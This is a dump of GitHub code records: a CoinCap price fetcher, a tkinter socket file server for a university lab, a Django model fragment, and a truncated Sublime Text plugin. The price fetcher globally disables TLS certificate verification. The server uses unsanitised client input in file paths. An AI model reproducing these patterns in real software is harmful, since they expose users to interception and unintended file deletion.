Meta:\n db_table = 't_task'\n", "repo_name": "cipher-ops/backend-kts", "sub_path": "kratos/apps/task/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.Model", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 8, "usage_type": "call"}, {"api_name": "kratos.apps.pipeline.models.Pipeline", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 9, "usage_type": "call"}, {"api_name": "kratos.apps.tasktpl.models.Tasktpl", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django_mysql.models.JSONField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "74992256165", "text": "import 
aiohttp\nimport asyncio\nimport logging\nfrom typing import (\n    Dict,\n    Optional,\n)\n\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\nclass Genv():\n    COIN_CAP_BASE_URL = \"https://api.coincap.io/v2\"\n    _shared_client=None\n    async def _http_client(self) -> aiohttp.ClientSession:\n        if self._shared_client is None:\n            self._shared_client = aiohttp.ClientSession()\n        return self._shared_client\n\n    async def fetch_prices(self):\n        try:\n            client = await self._http_client()\n            async with client.request(\"GET\", self.COIN_CAP_BASE_URL + \"/rates\") as resp: # query the CoinCap rates endpoint instead of the leftover test URL\n                rates_dict = await resp.json()\n                print(rates_dict)\n                for rate_obj in rates_dict[\"data\"]:\n                    symbol = rate_obj[\"symbol\"].upper()\n                    print(symbol)\n        except Exception:\n            raise\nasync def main():\n    a=Genv()\n    await a.fetch_prices()\nif __name__ == \"__main__\":\n    ev_loop: asyncio.AbstractEventLoop = asyncio.get_event_loop()\n    ev_loop.run_until_complete(main())", "repo_name": "koinotice/levenbot", "sub_path": "python/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 1162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib3.disable_warnings", "line_number": 10, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 10, "usage_type": "attribute"}, {"api_name": "ssl._create_default_https_context", "line_number": 12, "usage_type": "attribute"}, {"api_name": "ssl._create_unverified_context", "line_number": 12, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 18, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 16, "usage_type": "attribute"}, {"api_name": "asyncio.AbstractEventLoop", "line_number": 36, "usage_type": "attribute"}, {"api_name": "asyncio.get_event_loop", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "35090082802", "text": "#Patel, Meetkumar\r\n#UTA ID: 1001750000\r\n\r\n#getting all required libraries\r\nimport socket\r\nimport tkinter\r\nfrom socket import AF_INET, socket, SOCK_STREAM, SHUT_RDWR\r\nfrom threading import Thread\r\nfrom tkinter import *\r\nfrom threading import *\r\nimport os \r\nimport sys\r\nimport pickle\r\nfrom pathlib import Path\r\nimport json\r\nimport shutil\r\nfrom dirsync import sync\r\nimport distutils.dir_util\r\nfrom distutils.core import setup\r\n\r\n#setting default Path for directory's CRUD operations\r\nPATH = \"C:\\\\Users\\\\patel\\\\Desktop\\\\DS\"\r\nclient_path = \"C:\\\\Users\\\\patel\\\\Desktop\\\\DS_clients\"\r\nidentifiers = ['A','B','C']\r\nidentifier_count = 0\r\nclient_bind_identifier = {} #keeps track of which client has which identifier\r\nallocated_dirs = {} #keeps track of which identifier has which directories\r\ntry: \r\n    for i in range(len(identifiers)):\r\n        allocated_dirs[identifiers[i]] = os.listdir(os.path.join(client_path,identifiers[i]))\r\nexcept:\r\n    for i in range(len(identifiers)):\r\n        os.mkdir(os.path.join(client_path,identifiers[i])); allocated_dirs[identifiers[i]] = [] #os.mkdir returns None, so track a fresh empty directory list\r\n    \r\n\r\n#all os directory operations were referred from this: https://docs.python.org/3/library/os.html\r\n\r\n# Pathname manipulations: https://docs.python.org/2/library/os.path.html\r\n\r\n#this function will handle all incoming clients by providing them different threads and printing an appropriate message for their connection\r\ndef incoming_client_connections():\r\n    while True:\r\n        #server socket accepts all incoming client 
requests and stores client's address and metadata\r\n        client, client_address = SERVER.accept()\r\n        print(\"\\nClient at {} has connected\".format(client_address)) #prints that client address\r\n        client.send(bytes(\"\\nWelcome! Enter your username and press enter... OR Type (quit) to exit!\", FORMAT)) #Welcome message at client window after first client enters the name\r\n        addresses[client] = client_address # client address is stored in addresses array\r\n        Thread(target=handle_client, args=(client,)).start() # starts a new thread\r\n\r\n# extra function I wrote by mistake \r\ndef sync_dirs(current_client,current_identifier,no_of_dirs_temp):\r\n    no_of_dirs = no_of_dirs_temp\r\n    \r\n    for i in range(len(no_of_dirs)):\r\n        #https://www.geeksforgeeks.org/python-os-path-join-method/\r\n        src = os.path.join(PATH,no_of_dirs[i])\r\n        dest = os.path.join(os.path.join(client_path,current_identifier),no_of_dirs[i])\r\n        sync(src,dest,'sync')\r\n\r\ndef handle_client(client): # Takes client socket as argument, then redirects to commands as per input \r\n    global identifier_count, client_bind_identifier,client_path,allocated_dirs\r\n    while True:\r\n        #https://pythonpedia.com/en/tutorial/8710/sockets-and-message-encryption-decryption-between-client-and-server\r\n        name = client.recv(buffer_size).decode(FORMAT) #decoding incoming request strings \r\n        if name == \"quit\": #if message is quit, client will be disconnected \r\n            current_client = clients[client]\r\n            #https://www.geeksforgeeks.org/python-get-key-from-value-in-dictionary/\r\n            clients.pop(list(clients.keys())[list(clients.values()).index(current_client)]) #removing client from active_clients \r\n            message_list_box.insert(tkinter.END,\"\\nClient {} got offline...\".format(current_client))\r\n\r\n        elif ',' in name: #handle file operations\r\n            command = name.split(',')[0] #https://www.w3schools.com/python/ref_string_split.asp\r\n            if (command == \"create\"):\r\n                dir_name = name.split(',')[1]\r\n                new_path = os.path.join(PATH,clients[client])\r\n                if dir_name in os.listdir(new_path): #https://www.tutorialspoint.com/python/os_listdir.htm\r\n                    client.send(bytes(\"Directory with same name already exists\",FORMAT))\r\n                else:\r\n                    try: \r\n                        os.mkdir(os.path.join(new_path,dir_name))\r\n                        msg = \"Directory {} created...\".format(dir_name)\r\n                        client.send(bytes(msg,FORMAT))\r\n                    except:\r\n                        client.send(bytes(\"Path does not exist\",FORMAT))\r\n\r\n            elif command == \"home\":\r\n                path = os.path.join(PATH,clients[client])\r\n                all_dirs = str(os.listdir(path))\r\n                client.send(bytes(all_dirs,FORMAT))\r\n\r\n            elif command == \"delete\":\r\n                new_path = os.path.join(PATH,clients[client])\r\n                dir_name = name.split(',')[1]\r\n                check = os.path.exists(os.path.join(new_path,dir_name))\r\n                if check == False: #directory does not exist\r\n                    client.send(bytes(\"Directory with entered name does not exist... 
Try again...\",FORMAT))\r\n else: #directory exists\r\n try:\r\n os.rmdir(os.path.join(new_path,dir_name))\r\n client.send(bytes(\"Directory {} deleted...\".format(dir_name),FORMAT))\r\n except:\r\n client.send(bytes(\"Directory contains subdirectories...\",FORMAT))\r\n\r\n elif command == \"rename\":\r\n dir_names = name.split(',')[1]\r\n old_name = dir_names.split('-')[0]\r\n new_name = dir_names.split('-')[1]\r\n client_path = os.path.join(PATH,clients[client])\r\n old_path = os.path.join(os.path.join(PATH,clients[client]),old_name)\r\n new_path = os.path.join(os.path.join(PATH,clients[client]),new_name)\r\n if os.path.dirname(old_path) != os.path.dirname(new_path):\r\n client.send(bytes(\"Directory must follow the same path... Try again\",FORMAT))\r\n\r\n elif (os.path.dirname(old_path)!=os.path.dirname(new_path)) and (os.path.normpath(os.path.commonprefix([old_path,new_path]))!= client_path): #https://www.geeksforgeeks.org/python-os-path-commonprefix-method/\r\n #https://www.geeksforgeeks.org/python-os-path-normpath-method/\r\n client.send(bytes(\"You can not rename another client's directory\",FORMAT))\r\n\r\n else:\r\n try: \r\n os.rename(old_path,new_path)\r\n client.send(bytes(\"Directory renamed successfully...\",FORMAT))\r\n except:\r\n client.send(bytes(\"Requested path or directory does not exists. Try again\",FORMAT))\r\n \r\n elif command == \"move\":\r\n dir_names = name.split(',')[1]\r\n client_path = os.path.join(PATH,clients[client])\r\n os.chdir(client_path)\r\n old_path = os.path.join(client_path,dir_names.split('-')[0])\r\n new_path = os.path.join(client_path,dir_names.split('-')[1])\r\n # print(old_path)\r\n # print(new_path)\r\n # print(os.path.commonprefix([old_path,new_path]))\r\n # print(Path(os.path.commonprefix([old_path,new_path])))\r\n if os.path.dirname(old_path) == os.path.dirname(new_path):\r\n client.send(bytes(\"Directory must follow some different path...We can't move directory to same folder(path) Try again\",FORMAT))\r\n \r\n elif os.path.normpath(os.path.commonprefix([old_path,new_path]))== PATH:\r\n client.send(bytes(\"You can not move your directory to other client\",FORMAT))\r\n else:\r\n try: \r\n shutil.move(old_path,new_path) #https://www.geeksforgeeks.org/python-shutil-move-method/\r\n client.send(bytes(\"Directory moved successfully...\",FORMAT))\r\n except:\r\n client.send(bytes(\"Requested path or directory does not exists. 
Try again\",FORMAT))\r\n\r\n elif command == \"listall\":\r\n all_dirs = str(listalldirectories(clients[client]))\r\n client.send(bytes(all_dirs,FORMAT))\r\n\r\n elif command == \"getpath\":\r\n path = str(getpathalldirs(clients[client]))\r\n client.send(bytes(path,FORMAT))\r\n\r\n elif command == \"copydirs\":\r\n no_of_dirs = (name.split(',')[1]).split('-')\r\n if set(no_of_dirs).issubset(set(os.listdir(PATH))): #https://www.w3schools.com/python/ref_set_issubset.asp\r\n # try:\r\n current_client = clients[client]\r\n # print(client_bind_identifier)\r\n current_identifier = list(client_bind_identifier.keys())[list(client_bind_identifier.values()).index(current_client)]\r\n allocated_dirs[current_identifier] = no_of_dirs\r\n for i in range(len(no_of_dirs)):\r\n\r\n # os.mkdir(os.path.join(client_path,current_identifier)) #requested client's copy will be made at client side\r\n src = os.path.join(PATH,no_of_dirs[i]) #set source path as requested clients' folders\r\n # print(src)\r\n dest = os.path.join(os.path.join(client_path,current_identifier),no_of_dirs[i]) #set destination path as local path -> identifier -> given name\r\n # print(dest)\r\n # shutil.copytree(src,dest)\r\n distutils.dir_util.copy_tree(src, dest) #copying files from server to local directory\r\n #https://stackoverflow.com/questions/1511808/python-distutils-copy-tree-with-filter\r\n\r\n client.send(bytes(\"Files have been copied to local storage successfully ...\",FORMAT))\r\n\r\n # except:\r\n # sync(current_client,current_identifier)\r\n # client.send(\"Files have been synchronized successfully...\",FORMAT)\r\n else:\r\n client.send(bytes(\"Some files are not presented on server, check and try again\",FORMAT))\r\n\r\n elif command == \"sync\":\r\n current_client = clients[client]\r\n # print(\"current_client\",current_client)\r\n current_identifier = list(client_bind_identifier.keys())[list(client_bind_identifier.values()).index(current_client)]\r\n # print(current_client)\r\n # print(\"allocated\",allocated_dirs)\r\n # print(\"current id\",current_identifier)\r\n no_of_dirs_temp = allocated_dirs[current_identifier]\r\n # print(\"a\",current_identifier)\r\n # print(\"b\",allocated_dirs)\r\n # print(\"c\",no_of_dirs_temp)\r\n for i in range(len(no_of_dirs_temp)):\r\n src = os.path.join(PATH,no_of_dirs_temp[i])\r\n dest = os.path.join(os.path.join(client_path,current_identifier),no_of_dirs_temp[i])\r\n # print(src)\r\n # print(dest)\r\n #https://www.instructables.com/Syncing-Folders-With-Python/\r\n #https://stackoverflow.com/questions/54688687/how-to-synchronize-two-folders-using-python-script\r\n sync(src,dest,'sync',purge=True)\r\n\r\n elif command ==\"desync\":\r\n current_client = clients[client]\r\n current_identifier = list(client_bind_identifier.keys())[list(client_bind_identifier.values()).index(current_client)]\r\n # https://stackoverflow.com/questions/13118029/deleting-folders-in-python-recursively'\r\n no_of_dirs_temp = allocated_dirs[current_identifier]\r\n # print(\"new\",no_of_dirs_temp)\r\n for i in range(len(no_of_dirs_temp)):\r\n shutil.rmtree(os.path.join(os.path.join(client_path,current_identifier),no_of_dirs_temp[i]))\r\n\r\n client.send(bytes(\"Your local directories are successfully desynchronized...\",FORMAT))\r\n\r\n else: #new client\r\n #check username characters \r\n if not name.isalpha(): #https://www.w3schools.com/python/ref_string_isalpha.asp\r\n client.send(bytes(\"Enter valid username ! 
Illegal characters are not allowed\",FORMAT))\r\n                active_clients()\r\n\r\n            elif name in clients.values():\r\n                client.send(bytes(\"Client already there\",FORMAT))\r\n                active_clients()\r\n\r\n            else:\r\n                #check whether given path exists or not\r\n                # if given user name is present in system, log in the client and give access to directories\r\n                check = os.path.exists(os.path.join(PATH,name))\r\n                if check == True: # if client is already in system, he will be logged in and continue his operations\r\n                    msg = \"\\n\\n%s has logged in again with HOST ADDRESS: %s and PORT-NUMBER: %s\"%(name,HOST,PORT)\r\n                    client.send(bytes(\"\\nWelcome to server again...\",FORMAT))\r\n                    message_list_box.insert(tkinter.END,msg)\r\n                    \r\n                    id = identifiers[identifier_count]\r\n                    # print(\"idd client\",id)\r\n                    client.send(bytes(\"\\nYour new Identifier is...\",FORMAT))\r\n                    clients[client] = name\r\n                    active_clients()\r\n                    client.send(bytes(id,FORMAT))\r\n                    active_clients()\r\n                    # client.send(bytes(\"Available local directories\",FORMAT))\r\n                    client_bind_identifier[identifiers[identifier_count]] = name\r\n                    message_list_box.insert(tkinter.END,\"Clients registered with identifiers...\")\r\n                    message_list_box.insert(tkinter.END,client_bind_identifier)\r\n                    client.send(bytes(\"Available home directories on server\",FORMAT)) \r\n                    try:\r\n                        #creating local copy of client's identifier\r\n                        os.mkdir(os.path.join(client_path,identifiers[identifier_count]))\r\n                        identifier_count = identifier_count + 1\r\n                    except:\r\n                        # message_list_box.insert(tkinter.END,\"Client's local copy already exists..\")\r\n                        identifier_count = identifier_count + 1\r\n\r\n                else: #client will be registered as a new one \r\n                    clients[client] = name\r\n                    # print(\"idddd\",identifier_count)\r\n                    client.send(bytes(\"\\nWelcome to server!\",FORMAT))\r\n                    msg = \"\\n%s has joined with HOST ADDRESS:%s and PORT-NUMBER:%s\" % (name, HOST, PORT)\r\n                    message_list_box.insert(tkinter.END,msg)\r\n                    os.mkdir(os.path.join(PATH,name))\r\n\r\n                    id = identifiers[identifier_count]\r\n                    # print(\"idd client\",id)\r\n                    client.send(bytes(\"\\nYour new Identifier is...\",FORMAT))\r\n                    active_clients()\r\n                    client.send(bytes(id,FORMAT))\r\n\r\n                    \r\n                    client_bind_identifier[identifiers[identifier_count]] = name #https://stackoverflow.com/questions/20145154/dictinary-of-dictionary-in-python?rq=1\r\n                    message_list_box.insert(tkinter.END,\"Clients registered with identifiers...\")\r\n                    message_list_box.insert(tkinter.END,client_bind_identifier)\r\n                    client.send(bytes(\"Available home directories on server\",FORMAT))\r\n                    try:\r\n                        #creating local copy of client's identifier\r\n                        os.mkdir(os.path.join(client_path,identifiers[identifier_count]))\r\n                        identifier_count = identifier_count + 1\r\n                    except:\r\n                        # message_list_box.insert(tkinter.END,\"Client's local copy already exists..\")\r\n                        identifier_count = identifier_count + 1\r\n\r\n\r\n\r\ndef getpathalldirs(client): #returns list of paths to all directories for current client\r\n    paths = []\r\n    new_path = os.path.join(PATH,client)\r\n    #https://stackoverflow.com/questions/16953842/using-os-walk-to-recursively-traverse-directories-in-python\r\n    for path, subdirs, files in os.walk(new_path):\r\n        for name in subdirs:\r\n            paths.append(os.path.join(path,name))\r\n\r\n    return paths\r\n\r\ndef listalldirectories(client): #returns all directories at given path\r\n    dirs = []\r\n    #https://stackoverflow.com/questions/16953842/using-os-walk-to-recursively-traverse-directories-in-python\r\n    for a, subdirs, files in os.walk(os.path.join(PATH,client)):\r\n        for name in subdirs:\r\n            
dirs.append(name)\r\n    return dirs\r\n\r\ndef present_clients(): #function used to print all active + inactive clients on server side \r\n    dirs = []\r\n    for i in os.listdir(PATH):\r\n        dirs.append(i)\r\n    msg = list(dirs)\r\n    message_list_box.insert(tkinter.END,\"All clients present in system: (Active and inactive both)\\n\\n\",msg,\"\\n\")\r\n\r\ndef active_clients(): #function used to print all active clients right now at server \r\n    display_window =list(clients.values())\r\n    message_list_box.insert(tkinter.END, \"\\n\\n---------Currently active clients:---------\\n\\n\",display_window,\"\\n\")\r\n\r\n# def disconnect_client(client):\r\n    # handle_client()\r\ndef desync(): #desynchronizes directories and deletes the local copies\r\n    print(allocated_dirs)\r\n    for i in range(len(identifiers)):\r\n        id = identifiers[i]\r\n        no_of_dirs_temp = allocated_dirs[id]\r\n        for j in range(len(no_of_dirs_temp)):\r\n            shutil.rmtree(os.path.join(os.path.join(client_path,id),no_of_dirs_temp[j])) \r\n\r\ndef on_quit(root): #to close down server \r\n    SERVER.shutdown(SHUT_RDWR)\r\n    SERVER.close()\r\n    root.quit()\r\n    \r\n\r\n# how threads are created in while loop for all clients, I took from this site\r\n#https://medium.com/swlh/lets-write-a-chat-app-in-python-f6783a9ac170\r\n\r\n# how to use tkinter, I saw from this site and youtube video \r\n#https://realpython.com/python-gui-tkinter/\r\n#https://www.youtube.com/watch?v=YXPyB4XeYLA&ab_channel=freeCodeCamp.org\r\n\r\nif __name__ == \"__main__\": #main code\r\n    root = tkinter.Tk() #initialize window manager \r\n    root.title(\"Server window\") #title of server window\r\n    msg_frame = tkinter.Frame(root)\r\n    scroll_nav = tkinter.Scrollbar(msg_frame)\r\n    \r\n    message_list_box = tkinter.Listbox(msg_frame, height=23, width=75, yscrollcommand=scroll_nav.set)\r\n    scroll_nav.pack(side=tkinter.RIGHT, fill=tkinter.Y)\r\n    message_list_box.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\r\n\r\n    message_list_box.insert(tkinter.END, \"Waiting for clients to connect:\")\r\n    message_list_box.see(tkinter.END)\r\n\r\n    message_list_box.pack()\r\n    msg_frame.pack()\r\n    root.protocol(\"WM_DELETE_WINDOW\", lambda: on_quit(root)) #use the real Tk protocol name so the handler actually fires\r\n\r\n    send_button = tkinter.Button(root, text=\"Active Clients\",width= 15, command=active_clients) #button shows which clients are active right now \r\n    send_button.pack() \r\n    send_button = tkinter.Button(root, text=\"Present Clients(Active and inactive both)\",width= 30, command=present_clients) #button shows which clients are present on the server. They could be active or inactive\r\n    send_button.pack() \r\n    send_button = tkinter.Button(root, text=\"Desynchronize all clients: \",width= 30, command=desync) #this will delete all local directories without permission of clients\r\n    send_button.pack() \r\n\r\n\r\n    clients = {} #client's dictionary. 
maintains, clients' information: client's address and his name\r\n addresses = {} #i created this dictionary to store addresses but never used it further \r\n\r\n HOST = \"127.0.0.1\"\r\n PORT = 3000\r\n FORMAT = \"utf-8\"\r\n buffer_size = 1024\r\n ADDR = (HOST, PORT)\r\n\r\n SERVER = socket(AF_INET, SOCK_STREAM)\r\n SERVER.bind(ADDR) #bind server with his address\r\n\r\n SERVER.listen(3)#can concurrently run 3 clients\r\n ACCEPT_THREAD = Thread(target=incoming_client_connections)\r\n ACCEPT_THREAD.start() #starting thread \r\n tkinter.mainloop() #starts GUI \r\n ACCEPT_THREAD.join()\r\n SERVER.close()\r\n\r\n", "repo_name": "Meet1809/Distributed-Systems", "sub_path": "Lab 2/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 20113, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "dirsync.sync", "line_number": 58, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 76, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 
111, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.commonprefix", "line_number": 114, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.commonprefix", "line_number": 138, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 142, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "distutils.dist.dir_util.copy_tree", "line_number": 171, "usage_type": "call"}, {"api_name": "distutils.dist.dir_util", "line_number": 171, "usage_type": "attribute"}, {"api_name": "distutils.dist", "line_number": 171, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "dirsync.sync", "line_number": 200, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path", "line_number": 209, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path", "line_number": 226, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 226, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 230, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 241, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 257, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path", "line_number": 258, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 268, "usage_type": 
"attribute"}, {"api_name": "tkinter.END", "line_number": 269, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 273, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 273, "usage_type": "call"}, {"api_name": "os.path", "line_number": 273, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 283, "usage_type": "call"}, {"api_name": "os.path", "line_number": 283, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 285, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path", "line_number": 287, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 301, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 304, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 308, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "socket.socket.SHUT_RDWR", "line_number": 321, "usage_type": "attribute"}, {"api_name": "socket.socket", "line_number": 321, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 334, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 336, "usage_type": "call"}, {"api_name": "tkinter.Scrollbar", "line_number": 337, "usage_type": "call"}, {"api_name": "tkinter.Listbox", "line_number": 339, "usage_type": "call"}, {"api_name": "tkinter.RIGHT", "line_number": 340, "usage_type": "attribute"}, {"api_name": "tkinter.Y", "line_number": 340, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 341, "usage_type": "attribute"}, {"api_name": "tkinter.BOTH", "line_number": 341, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 343, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 344, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 350, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 352, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 354, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 367, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 367, "usage_type": "argument"}, {"api_name": "socket.SOCK_STREAM", "line_number": 367, "usage_type": "argument"}, {"api_name": "threading.Thread", "line_number": 371, "usage_type": "call"}, {"api_name": "tkinter.mainloop", "line_number": 373, "usage_type": "call"}]} +{"seq_id": "21224144418", "text": "import sublime\nimport sublime_plugin\nimport re\nfrom subprocess import check_output\nimport json\nimport os\n\nclass LaravelTransCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n folder = self.view.window().extract_variables()['folder']\n path = folder + \"/resources/lang/en/\"\n filelist = os.listdir(path)\n transfiles = list(map(lambda l: l.split('.')[0], filelist))\n print(transfiles)\n for region in self.view.sel():\n if region.empty():\n line = self.view.line(region)\n content = self.view.substr(line)\n trans = re.search('trans\\(\\'([a-zA-Z.-]*)\\'\\)', content)\n end = line.end()\n if trans:\n parts = trans.group(1).split('.')\n print(parts)\n file = 
